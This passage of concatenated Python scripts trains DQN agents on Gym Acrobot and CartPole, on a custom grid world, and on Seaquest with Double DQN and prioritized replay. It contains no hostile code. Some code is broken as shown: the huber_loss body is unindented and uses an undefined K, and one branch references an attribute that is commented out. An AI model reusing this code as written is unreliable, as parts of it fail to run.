        # output layer: one linear Q-value per action
        model.add(Dense(self.action_size, activation="linear"))
        model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
        return model

    def update_target_model(self):
        """Copy weights from self.model to self.target_model"""
        self.target_model.set_weights(self.model.get_weights())

    def remember(self, state, action, reward, next_state, done):
        """Adds a sample to the memory"""
        self.memory.append((state, action, reward, next_state, done))

    def act(self, state):
        """Takes action using Epsilon-Greedy Policy"""
        if np.random.random() <= self.epsilon:
            return random.randint(0, self.action_size-1)
        else:
            act_values = self.model.predict(state)
            # print("act_values:", act_values.shape)
            return np.argmax(act_values[0])

    def replay(self, batch_size):
        """Train on a replay memory with a batch_size of samples"""
        minibatch = random.sample(self.memory, batch_size)
        for state, action, reward, next_state, done in minibatch:
            target = reward
            if not done:
                # bootstrap from the frozen target network for stability
                target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
            target_f = self.model.predict(state)
            target_f[0][action] = target
            # NOTE(review): fits one transition at a time — slow but simple
            self.model.fit(state, target_f, epochs=1, verbose=0)
        # decay epsilon if possible
        self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)

    def load(self, name):
        """Load saved weights into both networks."""
        self.model.load_weights(name)
        self.target_model.load_weights(name)

    def save(self, name):
        """Persist network weights to `name`."""
        self.model.save_weights(name)
        self.target_model.save_weights(name)
if __name__ == "__main__":
    env = gym.make("Acrobot-v1")
    state_size = env.observation_space.shape[0]
    action_size = env.action_space.n
    agent = DQNAgent(state_size=state_size, action_size=action_size)
    # agent.load("AcroBot_v1.h5")
    done = False
    batch_size = 32
    # rolling window of the last SHOW_EVERY episode returns
    all_rewards = deque(maxlen=SHOW_EVERY)
    avg_rewards = []
    for e in range(EPISODES):
        state = env.reset()
        state = np.reshape(state, (1, state_size))
        rewards = 0
        while True:
            action = agent.act(state)
            # print(action)
            next_state, reward, done, info = env.step(action)
            # punish if not yet finished
            # reward = reward if not done else 10
            next_state = np.reshape(next_state, (1, state_size))
            agent.remember(state, action, reward, next_state, done)
            state = next_state
            if done:
                agent.update_target_model()
                break
            if e % RENDER_EVERY == 0:
                env.render()
            # NOTE(review): the terminal step's reward never reaches this line
            # (the loop breaks above when done), so it is excluded from `rewards`.
            rewards += reward
        # print(rewards)
        all_rewards.append(rewards)
        avg_reward = np.mean(all_rewards)
        avg_rewards.append(avg_reward)
        if e % SHOW_EVERY == 0:
            print(f"[{e:4}] avg reward:{avg_reward:.3f} eps: {agent.epsilon:.2f}")
        # train once per episode, once enough samples exist
        if len(agent.memory) > batch_size:
            agent.replay(batch_size)
    agent.save("AcroBot_v1.h5")
    plt.plot(list(range(EPISODES)), avg_rewards)
    plt.show()
import os
# to use CPU uncomment below code
# NOTE(review): the two lines below are active, so this script is pinned to CPU
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"   # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# TF1-style session config limiting parallelism and disabling the GPU
# NOTE(review): `config` is built here but never passed to a session below
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                        )
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam

# training-run hyperparameters
EPISODES = 1000  # number of training episodes
REPLAY_MEMORY_MAX = 5000  # replay buffer capacity
SHOW_EVERY = 100  # render interval (episodes)
class DQNAgent:
    """Single-network DQN agent with epsilon-greedy exploration."""

    def __init__(self, state_size, action_size):
        # observation vector length and discrete action count
        self.state_size = state_size
        self.action_size = action_size
        # replay buffer of (state, action, reward, next_state, done) tuples
        self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
        self.gamma = 0.95          # discount rate
        self.epsilon = 1.0         # exploration rate
        self.epsilon_min = 0.01
        self.epsilon_decay = 0.995
        self.learning_rate = 0.001
        # network is created by build_model()
        self.model = None
        self.build_model()

    def build_model(self):
        """Builds the DQN Model"""
        net = Sequential()
        for layer in (
            Dense(24, input_dim=self.state_size, activation="relu"),
            Dense(24, activation="relu"),
            # output layer: one linear Q-value per action
            Dense(self.action_size, activation="linear"),
        ):
            net.add(layer)
        net.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
        self.model = net

    def remember(self, state, action, reward, next_state, done):
        """Adds a sample to the memory"""
        self.memory.append((state, action, reward, next_state, done))

    def act(self, state):
        """Takes action using Epsilon-Greedy Policy"""
        explore = np.random.random() <= self.epsilon
        if explore:
            return random.randint(0, self.action_size - 1)
        q_values = self.model.predict(state)
        return np.argmax(q_values[0])

    def replay(self, batch_size):
        """Train on a replay memory with a batch_size of samples"""
        for state, action, reward, next_state, done in random.sample(self.memory, batch_size):
            # TD target: plain reward at terminal states, bootstrapped otherwise
            target = reward if done else (
                reward + self.gamma * np.max(self.model.predict(next_state)[0])
            )
            q_update = self.model.predict(state)
            q_update[0][action] = target
            self.model.fit(state, q_update, epochs=1, verbose=0)
        # decay epsilon if possible
        self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)

    def load(self, name):
        """Load saved weights into the network."""
        self.model.load_weights(name)

    def save(self, name):
        """Persist network weights to `name`."""
        self.model.save_weights(name)
if __name__ == "__main__":
    env = gym.make("CartPole-v1")
    state_size = env.observation_space.shape[0]
    action_size = env.action_space.n
    agent = DQNAgent(state_size=state_size, action_size=action_size)
    done = False
    batch_size = 32
    scores = []       # per-episode survival time (steps until done)
    avg_scores = []   # running average of `scores` after each episode
    avg_score = 0
    for e in range(EPISODES):
        state = env.reset()
        state = np.reshape(state, (1, state_size))
        # run one episode, at most 500 steps (CartPole-v1 cap)
        for t in range(500):
            action = agent.act(state)
            # print(action)
            next_state, reward, done, info = env.step(action)
            # punish if not yet finished
            reward = reward if not done else -10
            next_state = np.reshape(next_state, (1, state_size))
            agent.remember(state, action, reward, next_state, done)
            state = next_state
            if done:
                print(f"[{e:4}] avg score:{avg_score:.3f} eps: {agent.epsilon:.2f}")
                break
            if e % SHOW_EVERY == 0:
                env.render()
            # train on a minibatch every step once the buffer is large enough
            if len(agent.memory) > batch_size:
                agent.replay(batch_size)
        # `t` is the last step index reached in the episode (its score)
        scores.append(t)
        avg_score = np.average(scores)  # NOTE(review): recomputed over all episodes each time
        avg_scores.append(avg_score)
    agent.save("v1.h5")
    plt.plot(list(range(EPISODES)), avg_scores)
    plt.show()
import numpy as np
import keras.backend.tensorflow_backend as backend
from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten, LSTM
from keras.optimizers import Adam
from keras.callbacks import TensorBoard
import tensorflow as tf
from collections import deque
import time
import random
from tqdm import tqdm
import os
from PIL import Image
import cv2
import itertools
DISCOUNT = 0.96  # gamma: future-reward discount factor
REPLAY_MEMORY_SIZE = 50_000  # How many last steps to keep for model training
MIN_REPLAY_MEMORY_SIZE = 1_000  # Minimum number of steps in a memory to start training
MINIBATCH_SIZE = 32  # How many steps (samples) to use for training
UPDATE_TARGET_EVERY = 5  # Terminal states (end of episodes)
MODEL_NAME = '3x128-LSTM-7enemies-'
MIN_REWARD = -200  # For model save
MEMORY_FRACTION = 0.20  # GPU memory fraction (only used by the commented-out GPUOptions code below)

# Environment settings
EPISODES = 50_000

# Exploration settings
epsilon = 1.0  # not a constant, going to be decayed
EPSILON_DECAY = 0.999771
MIN_EPSILON = 0.01

#  Stats settings
AGGREGATE_STATS_EVERY = 100  # episodes
SHOW_PREVIEW = False
class Blob:
    """A point on a `size` x `size` grid, spawned at a random cell."""

    def __init__(self, size):
        self.size = size
        self.x = np.random.randint(0, size)
        self.y = np.random.randint(0, size)

    def __str__(self):
        return "Blob ({}, {})".format(self.x, self.y)

    def __sub__(self, other):
        # relative offset from `other` to this blob
        return (self.x - other.x, self.y - other.y)

    def __eq__(self, other):
        return (self.x, self.y) == (other.x, other.y)

    def action(self, choice):
        """Translate action code *choice* into a one-step move.

        0: +x, 1: -x, 2: +y, 3: -y.  Any other code leaves the blob in place.
        """
        deltas = {0: (1, 0), 1: (-1, 0), 2: (0, 1), 3: (0, -1)}
        if choice in deltas:
            dx, dy = deltas[choice]
            self.move(x=dx, y=dy)

    def move(self, x=False, y=False):
        """Shift by (x, y); an axis left as False takes a random step in {-1,0,1}."""
        dx = np.random.randint(-1, 2) if x is False else x
        dy = np.random.randint(-1, 2) if y is False else y
        self.x += dx
        self.y += dy
        # clamp both coordinates back onto the grid
        self.x = min(max(self.x, 0), self.size - 1)
        self.y = min(max(self.y, 0), self.size - 1)
class BlobEnv:
    """Grid world with one player, one food blob and `n_enemies` enemy blobs.

    Observations are either raw RGB grids (RETURN_IMAGES) or the flat list of
    every blob's coordinates.
    """
    SIZE = 20
    RETURN_IMAGES = False
    MOVE_PENALTY = 1
    ENEMY_PENALTY = 300
    FOOD_REWARD = 25
    # if RETURN_IMAGES:
    #     OBSERVATION_SPACE_VALUES = (SIZE, SIZE, 3)  # 4
    # else:
    #     OBSERVATION_SPACE_VALUES = (4,)
    ACTION_SPACE_SIZE = 4
    PLAYER_N = 1  # player key in dict
    FOOD_N = 2  # food key in dict
    ENEMY_N = 3  # enemy key in dict
    # the dict! (colors)
    d = {1: (255, 175, 0),
         2: (0, 255, 0),
         3: (0, 0, 255)}

    def __init__(self, n_enemies=7):
        self.n_enemies = n_enemies
        # a dry-run reset determines the observation vector length
        self.n_states = len(self.reset())

    def reset(self):
        """Respawn all blobs on distinct cells; return the first observation."""
        self.enemies = []
        self.player = Blob(self.SIZE)
        self.food = Blob(self.SIZE)
        while self.food == self.player:
            self.food = Blob(self.SIZE)
        for i in range(self.n_enemies):
            enemy = Blob(self.SIZE)
            while enemy == self.player or enemy == self.food:
                enemy = Blob(self.SIZE)
            self.enemies.append(enemy)
        self.episode_step = 0
        if self.RETURN_IMAGES:
            observation = np.array(self.get_image())
        else:
            # all blob's coordinates
            observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
        return observation

    def step(self, action):
        """Apply `action` to the player; return (observation, reward, done)."""
        self.episode_step += 1
        self.player.action(action)
        #### MAYBE ###
        #enemy.move()
        #food.move()
        ##############
        if self.RETURN_IMAGES:
            new_observation = np.array(self.get_image())
        else:
            new_observation = [self.player.x, self.player.y, self.food.x, self.food.y] + list(itertools.chain(*[[e.x, e.y] for e in self.enemies]))
        # set the reward to move penalty by default
        reward = -self.MOVE_PENALTY
        if self.player == self.food:
            # if the player hits the food, good reward
            reward = self.FOOD_REWARD
        else:
            for enemy in self.enemies:
                if enemy == self.player:
                    # if the player hits one of the enemies, heavy punishment
                    reward = -self.ENEMY_PENALTY
                    break
        # the episode ends on food, on an enemy, or after 200 steps
        done = False
        if reward == self.FOOD_REWARD or reward == -self.ENEMY_PENALTY or self.episode_step >= 200:
            done = True
        return new_observation, reward, done

    def render(self):
        """Display the rasterized grid, scaled to 300x300, via OpenCV."""
        img = self.get_image()
        img = img.resize((300, 300))  # resizing so we can see our agent in all its glory.
        cv2.imshow("image", np.array(img))  # show it!
        cv2.waitKey(1)

    # FOR CNN #
    def get_image(self):
        """Rasterize the grid into a SIZE x SIZE RGB PIL image."""
        env = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8)  # starts an rgb of our size
        env[self.food.x][self.food.y] = self.d[self.FOOD_N]  # sets the food location tile to green color
        for enemy in self.enemies:
            # BUGFIX: was `self.d[ENEMY_N]` — ENEMY_N is a class attribute, not a
            # module-level name, so render()/get_image() raised NameError.
            env[enemy.x][enemy.y] = self.d[self.ENEMY_N]  # sets the enemy location to red
        env[self.player.x][self.player.y] = self.d[self.PLAYER_N]  # sets the player tile to blue
        img = Image.fromarray(env, 'RGB')
        return img
# instantiate the environment (defaults to 7 enemies)
env = BlobEnv()

# For stats
ep_rewards = [-200]

# For more repetitive results
random.seed(1)
np.random.seed(1)
tf.set_random_seed(1)

# Memory fraction, used mostly when training multiple agents
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
#backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))

# Create models folder
if not os.path.isdir('models'):
    os.makedirs('models')
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
    """Keras TensorBoard callback tweaked for RL: one writer, external step counter.

    NOTE(review): relies on TF1.x / standalone-Keras internals
    (`tf.summary.FileWriter`, `_write_logs`) — not compatible with TF2-era Keras.
    """

    # Overriding init to set initial step and writer (we want one log file for all .fit() calls)
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        self.step = 1
        self.writer = tf.summary.FileWriter(self.log_dir)

    # Overriding this method to stop creating default log writer
    def set_model(self, model):
        pass

    # Overrided, saves logs with our step number
    # (otherwise every .fit() will start writing from 0th step)
    def on_epoch_end(self, epoch, logs=None):
        self.update_stats(**logs)

    # Overrided
    # We train for one batch only, no need to save anything at epoch end
    def on_batch_end(self, batch, logs=None):
        pass

    # Overrided, so won't close writer
    def on_train_end(self, _):
        pass

    # Custom method for saving own metrics
    # Creates writer, writes custom metrics and closes writer
    def update_stats(self, **stats):
        self._write_logs(stats, self.step)
# Agent class
class DQNAgent:
    """DQN agent with online (`model`) and target (`target_model`) networks.

    With state_in_image=True the networks are CNNs over RGB grids; otherwise
    stacked LSTMs over the flat coordinate vector fed as a length-1 sequence
    (hence the `expand_dims(..., axis=1)` calls below).
    """

    def __init__(self, state_in_image=True):
        self.state_in_image = state_in_image
        # Main model
        self.model = self.create_model()
        # Target network
        self.target_model = self.create_model()
        self.target_model.set_weights(self.model.get_weights())
        # An array with last n steps for training
        self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
        # Custom tensorboard object
        self.tensorboard = ModifiedTensorBoard(log_dir="logs/{}-{}".format(MODEL_NAME, int(time.time())))
        # Used to count when to update target network with main network's weights
        self.target_update_counter = 0

    def create_model(self):
        # get the NN input length
        model = Sequential()
        if self.state_in_image:
            model.add(Conv2D(256, (3, 3), input_shape=env.OBSERVATION_SPACE_VALUES))  # OBSERVATION_SPACE_VALUES = (10, 10, 3) a 10x10 RGB image.
            model.add(Activation('relu'))
            model.add(MaxPooling2D(pool_size=(2, 2)))
            model.add(Dropout(0.2))
            model.add(Conv2D(256, (3, 3)))
            model.add(Activation('relu'))
            model.add(MaxPooling2D(pool_size=(2, 2)))
            model.add(Dropout(0.2))
            model.add(Flatten())  # this converts our 3D feature maps to 1D feature vectors
            model.add(Dense(32))
        else:
            # earlier dense variant kept for reference:
            # model.add(Dense(32, activation="relu", input_shape=(env.n_states,)))
            # model.add(Dense(32, activation="relu"))
            # model.add(Dropout(0.2))
            # model.add(Dense(32, activation="relu"))
            # model.add(Dropout(0.2))
            model.add(LSTM(128, activation="relu", input_shape=(None, env.n_states,), return_sequences=True))
            model.add(Dropout(0.3))
            model.add(LSTM(128, activation="relu", return_sequences=True))
            model.add(Dropout(0.3))
            model.add(LSTM(128, activation="relu", return_sequences=False))
            model.add(Dropout(0.3))
        model.add(Dense(env.ACTION_SPACE_SIZE, activation='linear'))  # ACTION_SPACE_SIZE = how many choices (9)
        model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=['accuracy'])
        return model

    # Adds step's data to a memory replay array
    # (observation space, action, reward, new observation space, done)
    def update_replay_memory(self, transition):
        self.replay_memory.append(transition)

    # Trains main network every step during episode
    def train(self, terminal_state, step):
        # Start training only if certain number of samples is already saved
        if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
            return

        # Get a minibatch of random samples from memory replay table
        minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)

        # Get current states from minibatch, then query NN model for Q values
        # (image states are scaled to [0, 1]; coordinate states are used as-is)
        if self.state_in_image:
            current_states = np.array([transition[0] for transition in minibatch])/255
        else:
            current_states = np.array([transition[0] for transition in minibatch])
        # axis=1 adds the sequence dimension the LSTM input expects
        current_qs_list = self.model.predict(np.expand_dims(current_states, axis=1))

        # Get future states from minibatch, then query NN model for Q values
        # When using target network, query it, otherwise main network should be queried
        if self.state_in_image:
            new_current_states = np.array([transition[3] for transition in minibatch])/255
        else:
            new_current_states = np.array([transition[3] for transition in minibatch])
        future_qs_list = self.target_model.predict(np.expand_dims(new_current_states, axis=1))

        X = []  # states (network inputs)
        y = []  # updated Q-vectors (network targets)

        # Now we need to enumerate our batches
        for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
            # If not a terminal state, get new q from future states, otherwise set it to 0
            # almost like with Q Learning, but we use just part of equation here
            if not done:
                max_future_q = np.max(future_qs_list[index])
                new_q = reward + DISCOUNT * max_future_q
            else:
                new_q = reward

            # Update Q value for given state
            current_qs = current_qs_list[index]
            current_qs[action] = new_q

            # And append to our training data
            X.append(current_state)
            y.append(current_qs)

        # Fit on all samples as one batch, log only on terminal state
        if self.state_in_image:
            self.model.fit(np.array(X)/255, np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
        else:
            # self.model.fit(np.array(X), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
            self.model.fit(np.expand_dims(X, axis=1), np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)

        # Update target network counter every episode
        if terminal_state:
            self.target_update_counter += 1

        # If counter reaches set value, update target network with weights of main network
        if self.target_update_counter > UPDATE_TARGET_EVERY:
            self.target_model.set_weights(self.model.get_weights())
            self.target_update_counter = 0

    # Queries main network for Q values given current observation space (environment state)
    def get_qs(self, state):
        if self.state_in_image:
            return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
        else:
            # return self.model.predict(np.array(state).reshape(1, env.n_states))[0]
            # shape: (batch=1, seq=1, features)
            return self.model.predict(np.array(state).reshape(1, 1, env.n_states))[0]
agent = DQNAgent(state_in_image=False)
print("Number of states:", env.n_states)
# agent.model.load_weights("models/2x32____22.00max___-2.44avg_-200.00min__1563463022.model")

# Iterate over episodes
for episode in tqdm(range(1, EPISODES + 1), ascii=True, unit='episodes'):
    # Update tensorboard step every episode
    agent.tensorboard.step = episode
    # Restarting episode - reset episode reward and step number
    episode_reward = 0
    step = 1
    # Reset environment and get initial state
    current_state = env.reset()
    # Reset flag and start iterating until episode ends
    done = False
    while not done:
        # This part stays mostly the same, the change is to query a model for Q values
        if np.random.random() > epsilon:
            # Get action from Q table
            action = np.argmax(agent.get_qs(current_state))
        else:
            # Get random action
            action = np.random.randint(0, env.ACTION_SPACE_SIZE)
        new_state, reward, done = env.step(action)
        # Transform new continous state to new discrete state and count reward
        episode_reward += reward
        if SHOW_PREVIEW and not episode % AGGREGATE_STATS_EVERY:
            env.render()
        # Every step we update replay memory and train main network
        agent.update_replay_memory((current_state, action, reward, new_state, done))
        agent.train(done, step)
        current_state = new_state
        step += 1
    # Append episode reward to a list and log stats (every given number of episodes)
    ep_rewards.append(episode_reward)
    if not episode % AGGREGATE_STATS_EVERY or episode == 1:
        average_reward = sum(ep_rewards[-AGGREGATE_STATS_EVERY:])/len(ep_rewards[-AGGREGATE_STATS_EVERY:])
        min_reward = min(ep_rewards[-AGGREGATE_STATS_EVERY:])
        max_reward = max(ep_rewards[-AGGREGATE_STATS_EVERY:])
        agent.tensorboard.update_stats(reward_avg=average_reward, reward_min=min_reward, reward_max=max_reward, epsilon=epsilon)
        # Save a checkpoint when the rolling AVERAGE reward clears the threshold
        if average_reward >= -220:
            agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
    # Decay epsilon
    if epsilon > MIN_EPSILON:
        epsilon *= EPSILON_DECAY
        epsilon = max(MIN_EPSILON, epsilon)
# final checkpoint, named after the last aggregated statistics
agent.model.save(f'models/{MODEL_NAME}__{max_reward:_>7.2f}max_{average_reward:_>7.2f}avg_{min_reward:_>7.2f}min__{int(time.time())}.model')
# OpenGym Seaquest-v0
# -------------------
#
# This code demonstrates a Double DQN network with Priority Experience Replay
# in an OpenGym Seaquest-v0 environment.
#
# Made as part of blog series Let's make a DQN, available at:
# https://jaromiru.com/2016/11/07/lets-make-a-dqn-double-learning-and-prioritized-experience-replay/
#
# author: Jaromir Janisch, 2016
import matplotlib
import random, numpy, math, gym, scipy
import tensorflow as tf
import time
from SumTree import SumTree
from keras.callbacks import TensorBoard
from collections import deque
import tqdm
# Frame dimensions after preprocessing (see processImage below)
IMAGE_WIDTH = 84
IMAGE_HEIGHT = 84
# Number of consecutive frames stacked into one state
IMAGE_STACK = 2
# Delta at which the Huber loss switches from quadratic to linear
HUBER_LOSS_DELTA = 2.0
# RMSprop learning rate for the Q-network
LEARNING_RATE = 0.00045
#-------------------- Modified Tensorboard -----------------------
class RLTensorBoard(TensorBoard):
    """Keras TensorBoard callback adapted for RL training.

    The stock callback creates a new log file (and restarts its step
    counter) on every ``.fit()`` call; in this code ``.fit()`` is invoked
    once per training step, so we keep a single writer open and track the
    global step ourselves.
    """
    def __init__(self, **kwargs):
        """Create one persistent FileWriter and start the step counter at 1."""
        super().__init__(**kwargs)
        self.step = 1
        self.writer = tf.summary.FileWriter(self.log_dir)
    def set_model(self, model):
        """Overridden as a no-op so Keras does not create its default writer."""
        pass
    def on_epoch_end(self, epoch, logs=None):
        """Log metrics under our own global step instead of the epoch number
        (otherwise every .fit() call would restart from step 0)."""
        self.update_stats(**logs)
    def on_batch_end(self, batch, logs=None):
        """No-op: we train one batch per .fit() call, nothing to log here."""
        pass
    def on_train_end(self, _):
        """No-op: keep the shared writer open across .fit() calls."""
        pass
    def update_stats(self, **stats):
        """Write custom scalar metrics at the current global step."""
        self._write_logs(stats, self.step)
#-------------------- UTILITIES -----------------------
def huber_loss(y_true, y_pred):
err = y_true - y_pred
cond = K.abs(err) < HUBER_LOSS_DELTA
L2 = 0.5 * K.square(err)
L1 = HUBER_LOSS_DELTA * (K.abs(err) - 0.5 * HUBER_LOSS_DELTA)
loss = tf.where(cond, L2, L1) # Keras does not cover where function in tensorflow :-(
return K.mean(loss)
def processImage( img ):
    """Resize a raw RGB frame to IMAGE_WIDTH x IMAGE_HEIGHT, convert it
    to luminance and normalize pixel values into roughly [-1, 1)."""
    resized = scipy.misc.imresize(img, (IMAGE_WIDTH, IMAGE_HEIGHT), interp='bilinear')
    # ITU-R BT.601 luma weights for the R, G and B channels
    luminance = (0.2989 * resized[:, :, 0]
                 + 0.5870 * resized[:, :, 1]
                 + 0.1140 * resized[:, :, 2])
    # uint8 [0, 255] -> float32 centred around zero
    return luminance.astype('float32') / 128 - 1
#-------------------- BRAIN ---------------------------
from keras.models import Sequential
from keras.layers import *
from keras.optimizers import *
model_name = "conv2dx3"
class Brain:
    """Holds the online and target Q-networks (Double DQN)."""
    def __init__(self, stateCnt, actionCnt):
        self.stateCnt = stateCnt      # (stack, width, height) input shape
        self.actionCnt = actionCnt    # size of the discrete action space
        self.model = self._createModel()
        self.model_ = self._createModel() # target network
        # custom tensorboard (single writer shared across all .fit() calls)
        self.tensorboard = RLTensorBoard(log_dir="logs/{}-{}".format(model_name, int(time.time())))
    def _createModel(self):
        """Build the convolutional Q-network mapping stacked frames to
        one Q-value per action."""
        model = Sequential()
        model.add(Conv2D(32, (8, 8), strides=(4,4), activation='relu', input_shape=(self.stateCnt), data_format='channels_first'))
        model.add(Conv2D(64, (4, 4), strides=(2,2), activation='relu'))
        model.add(Conv2D(64, (3, 3), activation='relu'))
        model.add(Flatten())
        model.add(Dense(units=512, activation='relu'))
        # BUG FIX: was `units=actionCnt`, an undefined local in this
        # method (NameError at model-build time); the attribute is
        # self.actionCnt.
        model.add(Dense(units=self.actionCnt, activation='linear'))
        opt = RMSprop(lr=LEARNING_RATE)
        model.compile(loss=huber_loss, optimizer=opt)
        return model
    def train(self, x, y, epochs=1, verbose=0):
        """One gradient update (batch size 32) on the online network."""
        self.model.fit(x, y, batch_size=32, epochs=epochs, verbose=verbose, callbacks=[self.tensorboard])
    def predict(self, s, target=False):
        """Q-values for a batch of states, from target or online net."""
        if target:
            return self.model_.predict(s)
        else:
            return self.model.predict(s)
    def predictOne(self, s, target=False):
        """Q-values for a single state (adds the batch dimension)."""
        return self.predict(s.reshape(1, IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT), target).flatten()
    def updateTargetModel(self):
        """Copy online-network weights into the target network."""
        self.model_.set_weights(self.model.get_weights())
#-------------------- MEMORY --------------------------
class Memory:   # stored as ( s, a, r, s_ ) in SumTree
    """Prioritized replay buffer backed by a SumTree.

    Priorities are (|TD error| + e) ** a; sampling draws one value
    uniformly from each of n equal slices of the total priority mass.
    """
    e = 0.01  # small constant so zero-error samples can still be drawn
    a = 0.6   # strength of prioritization (0 would be uniform)

    def __init__(self, capacity):
        self.tree = SumTree(capacity)

    def _getPriority(self, error):
        # proportional prioritization with an epsilon offset
        return (error + self.e) ** self.a

    def add(self, error, sample):
        self.tree.add(self._getPriority(error), sample)

    def sample(self, n):
        """Return n (tree_index, experience) pairs, one drawn from each
        equal-mass segment of the total priority."""
        span = self.tree.total() / n
        picks = [random.uniform(span * k, span * (k + 1)) for k in range(n)]
        return [(idx, data) for idx, _, data in (self.tree.get(v) for v in picks)]

    def update(self, idx, error):
        self.tree.update(idx, self._getPriority(error))
#-------------------- AGENT ---------------------------
MEMORY_CAPACITY = 50_000   # max transitions held in replay memory
BATCH_SIZE = 32            # minibatch size sampled per replay step
GAMMA = 0.95               # discount factor for future rewards
MAX_EPSILON = 1            # initial exploration rate
MIN_EPSILON = 0.05         # floor of the exploration rate
EXPLORATION_STOP = 500_000   # step at which the decay term reaches 0.01
LAMBDA = - math.log(0.01) / EXPLORATION_STOP # speed of decay
UPDATE_TARGET_FREQUENCY = 10_000   # steps between target-network syncs
UPDATE_STATS_EVERY = 5     # episodes between TensorBoard stat dumps
RENDER_EVERY = 50          # render one episode out of this many
class Agent:
    """Double-DQN agent with prioritized experience replay."""
    steps = 0
    epsilon = MAX_EPSILON

    def __init__(self, stateCnt, actionCnt, brain):
        self.stateCnt = stateCnt
        self.actionCnt = actionCnt
        self.brain = brain
        # NOTE: self.memory is assigned externally after the random-agent
        # warm-up phase (see the main script below), not created here.
        # self.memory = Memory(MEMORY_CAPACITY)

    def act(self, s):
        """Epsilon-greedy action selection."""
        if random.random() < self.epsilon:
            return random.randint(0, self.actionCnt-1)
        else:
            return numpy.argmax(self.brain.predictOne(s))

    def observe(self, sample):  # in (s, a, r, s_) format
        """Store a transition with its TD-error priority, sync the target
        network periodically and decay epsilon."""
        x, y, errors = self._getTargets([(0, sample)])
        self.memory.add(errors[0], sample)
        if self.steps % UPDATE_TARGET_FREQUENCY == 0:
            self.brain.updateTargetModel()
        # slowly decrease epsilon based on our experience
        self.steps += 1
        self.epsilon = MIN_EPSILON + (MAX_EPSILON - MIN_EPSILON) * math.exp(-LAMBDA * self.steps)

    def _getTargets(self, batch):
        """Compute (inputs, targets, TD errors) for a batch of
        (tree_index, (s, a, r, s_)) pairs."""
        no_state = numpy.zeros(self.stateCnt)
        states = numpy.array([ o[1][0] for o in batch ])
        states_ = numpy.array([ (no_state if o[1][3] is None else o[1][3]) for o in batch ])
        # BUG FIX: these three predictions used the module-level global
        # `agent` instead of self, which silently couples the instance to
        # that global (and breaks for any other Agent instance).
        p = self.brain.predict(states)
        p_ = self.brain.predict(states_, target=False)      # online net picks the action
        pTarget_ = self.brain.predict(states_, target=True)  # target net evaluates it
        x = numpy.zeros((len(batch), IMAGE_STACK, IMAGE_WIDTH, IMAGE_HEIGHT))
        y = numpy.zeros((len(batch), self.actionCnt))
        errors = numpy.zeros(len(batch))
        for i in range(len(batch)):
            o = batch[i][1]
            # BUG FIX: the original line `s = o[0] a = o[1] r = o[2] s_ = o[3]`
            # was a syntax error (four assignments on one line with no
            # separators); tuple-unpack the transition instead.
            s, a, r, s_ = o
            t = p[i]
            oldVal = t[a]
            if s_ is None:
                t[a] = r  # terminal state: no bootstrap term
            else:
                t[a] = r + GAMMA * pTarget_[i][ numpy.argmax(p_[i]) ]  # double DQN
            x[i] = s
            y[i] = t
            errors[i] = abs(oldVal - t[a])
        return (x, y, errors)

    def replay(self):
        """Sample a prioritized minibatch, refresh its priorities with the
        new TD errors and train the online network."""
        batch = self.memory.sample(BATCH_SIZE)
        x, y, errors = self._getTargets(batch)
        # update errors
        for i in range(len(batch)):
            idx = batch[i][0]
            self.memory.update(idx, errors[i])
        self.brain.train(x, y)
class RandomAgent:
    """Warm-up agent: acts uniformly at random to pre-fill the replay
    memory, using |reward| as a stand-in priority."""
    memory = Memory(MEMORY_CAPACITY)
    exp = 0
    epsilon = MAX_EPSILON

    def __init__(self, actionCnt, brain):
        self.actionCnt = actionCnt
        self.brain = brain

    def act(self, s):
        # uniform random action; the state is ignored
        return random.randint(0, self.actionCnt-1)

    def observe(self, sample):  # in (s, a, r, s_) format
        # no TD error exists yet, so |reward| serves as the priority
        reward = sample[2]
        self.memory.add(abs(reward), sample)
        self.exp += 1

    def replay(self):
        # the random agent never learns
        pass
#-------------------- ENVIRONMENT ---------------------
class Environment:
    """Wraps a gym environment: runs whole episodes, keeps a rolling
    reward window and periodically logs stats / saves the model."""
    def __init__(self, problem):
        self.problem = problem
        self.env = gym.make(problem)
        # rolling window of the last UPDATE_STATS_EVERY episode rewards
        self.ep_rewards = deque(maxlen=UPDATE_STATS_EVERY)

    def run(self, agent, step):
        """Play one full episode with `agent`; return the windowed
        average episode reward."""
        img = self.env.reset()
        w = processImage(img)
        s = numpy.array([w, w])  # initial state: the first frame, twice
